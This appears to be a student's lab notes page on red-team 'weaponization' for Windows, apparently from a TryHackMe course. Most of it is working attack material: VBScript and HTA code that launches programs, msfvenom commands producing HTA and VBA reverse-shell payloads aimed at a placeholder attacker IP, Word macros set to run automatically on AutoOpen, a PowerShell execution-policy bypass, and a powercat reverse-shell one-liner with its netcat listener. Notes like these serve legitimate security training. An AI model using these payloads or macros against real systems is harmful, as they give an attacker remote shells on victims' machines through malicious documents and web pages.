Weaponization

Weaponizatiion is when red teamers use their own crafted tools to exploit a target

Windows Scripting Host (WSH)

Windows scripting host is a built-in Windows administration tool that runs batch files to automate and manage tasks within the operating system. It uses VBScript

Showing a message box

Windows message box

Dim message
message = "Hello"
MsgBox message

run it in cmd: wscript hello.vbs

Use it to run exe files

Run an exe file with VBScript

Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

Execute it with wscript or cscript in cmd: wscript c:\Users\thm\Desktop\calc.vbs or cscript.exe c:\Users\thm\Desktop\calc.vbs
In case of blacklist, possible to rename in txt and still run it: wscript /e:VBScript c:\Users\thm\Desktop\payload.txt

HTML Application (HTA)

Using and `ActiveXObject to execute cmd.exe

<html>
<body>
<script>
        var c= 'cmd.exe'
        new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

serve the payload python3 -m http.server 8000
Visit the page from the target machine http://IP-ATTACK-MACHINE:8000/payload.hta and run it

Reverse shell

Create a reverse shell with msfvenom msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP-ATTACK-MACHINE LPORT=443 -f hta-psh -o thm.hta
Launch a listener: nc -lvp 443
The reverse shell is launched when the link is visited from the target machine
Possible to generate and serve HTA with Metasploit framework use exploit/windows/misc/hta_serverand we need to set LHOST, LPORT, SRVHOST, Payload we can use this payload windows/meterpreter/reverse_tcp
When the link is visited in the target we get a meterpreter shell

Visual Basic for Application (VBA)

We need to use Word
We open Visual Basic Editor by selecting view → macros
We can give a name to our macro and click create
We then can make another message box

Sub MACRONAME()
  MsgBox ("Message in a box")
End Sub

We run the macro with F5
To execute it automatically we can use after the document is open we need to use AutoOpen and Document_open

Sub Document_Open()
  MACRONAME
End Sub

Sub AutoOpen()
  MACRONAME
End Sub

Sub MACRONAME()
  MsgBox ("Message in a box")
End Sub

we save the document in docm or doc

Execute a bin

Sub ExecBin()
        Dim payload As String
        payload = "calc.exe"
        CreateObject("Wscript.Shell").Run payload,0
End Sub

Use msfvenom for VBA

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKING-MACHINE-IP LPORT=443 -f vba

We just need to copy the output in the file
We set the listener with msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp we set also LHOST and LPORT
When the doc is open in the target machine we get a shell

PowerShell

Write something with powershell we open a text editor and put this inside: Write-Output "something"
We save the file with .PS1 extension
We can execute it from the cmd: powershell -File thm.ps1

Execution policy

See if we are restricted: Get-ExecutionPolicy
Change it: Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
we can also bypassing when executing the script: powershell -ex bypass -File script.ps1

Getting a reverse shell

We can use powercat
We set up a listener nc -lvp 443
We launch powercat powershell -c "powercat -c ATTACKING-MACHINE-IPP -p 443 -e cmd"
We should get a shell

A great tool to generate reverse shell payloads

Revshells.com

Resources

PreviousAV Evasion NextUseful commands in Powershell, CMD and Sysinternals

Last updated 3 years ago

hashtagWindows Scripting Host (WSH)

hashtagShowing a message box

hashtagUse it to run exe files

hashtagHTML Application (HTA)

hashtagUsing and `ActiveXObject to execute cmd.exe

hashtagReverse shell

hashtagVisual Basic for Application (VBA)

hashtagExecute a bin

hashtagUse msfvenom for VBA

hashtagPowerShell

hashtagExecution policy

hashtagGetting a reverse shell

hashtagA great tool to generate reverse shell payloads

hashtagResources